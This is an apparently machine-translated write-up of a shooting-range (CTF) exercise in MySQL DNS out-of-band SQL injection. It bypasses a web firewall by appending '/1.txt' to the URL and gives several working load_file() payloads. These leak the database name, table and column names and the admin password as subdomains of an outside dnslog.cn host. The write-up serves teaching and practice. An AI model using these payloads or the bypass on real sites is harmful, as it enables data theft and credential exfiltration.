Mysql injection-DNS injection
The
principle of the shooting range address : use the UNC path to access the server, dns will have a log, through subquery, splicing the content into the domain name, let load_file() access the shared file, the accessed domain name is recorded, and it becomes an error injection. Inject the blind note to change the display error, read the remote shared file, query through the splicing function, splicing into the domain name, access the server during access, and view the log after recording
1., we see the shooting range, first try the simplest get parameter pass, inject
it is to directly splice the id pass parameter into it, and then use the mysqli_connect() function to query the database. We will enter the content afterwards as a matter of course? id=1 The test
page is normal, continue to enter and 1=1
but it is blocked by the website firewall, so we try to bypass the firewall, enter the url field at the back, and add a /1.txt after the URL, because the website firewall will think 1 .txt is a harmless file, whitelisted, considered trustworthy, and when 1.txt is not found, it will go to the upper level for review.
This is the older waf
successfully bypassed, the page returns to normal, continue to enter and 1=2, it is judged that the page echoed
page has no echo, we continue to input sleep(5) The
page has a significant delay, so the judgment can be considered that this page has delayed injection.
According to the delayed injection method, it can be done, but it will cost a lot Time, so we tried to use the dns injection method to query the database name by dns error reporting
in the url column. Enter in the url column
?id=1 and (select load_file(concat('//',(select database()),'.57t2co.dnslog.cn/abc')))
Get the database name
Continue to query the table name, enter the code in the url
?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.57t2co.dnslog.cn/abc')))
Get the table name and use limit to query all table names
?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.57t2co.dnslog.cn/abc')))
?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.57t2co.dnslog.cn/abc')))
It is found that there are only two table names.
Then judge that the flag may exist in the admin table, query the data of the admin table,
enter the code
?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 0,1),'.57t2co.dnslog.cn/abc')))
Continue to use limit to query field names
?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 1,1),'.57t2co.dnslog.cn/abc')))
…
?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 3,1),'.57t2co.dnslog.cn/abc')))
ID, username, password, there are only three data, it may be in the password field, let us query the password data
?id=1 and (select load_file(concat('\\\\',(select password from admin limit 0,1),'.57t2co.dnslog.cn/abc')))
1flag1good1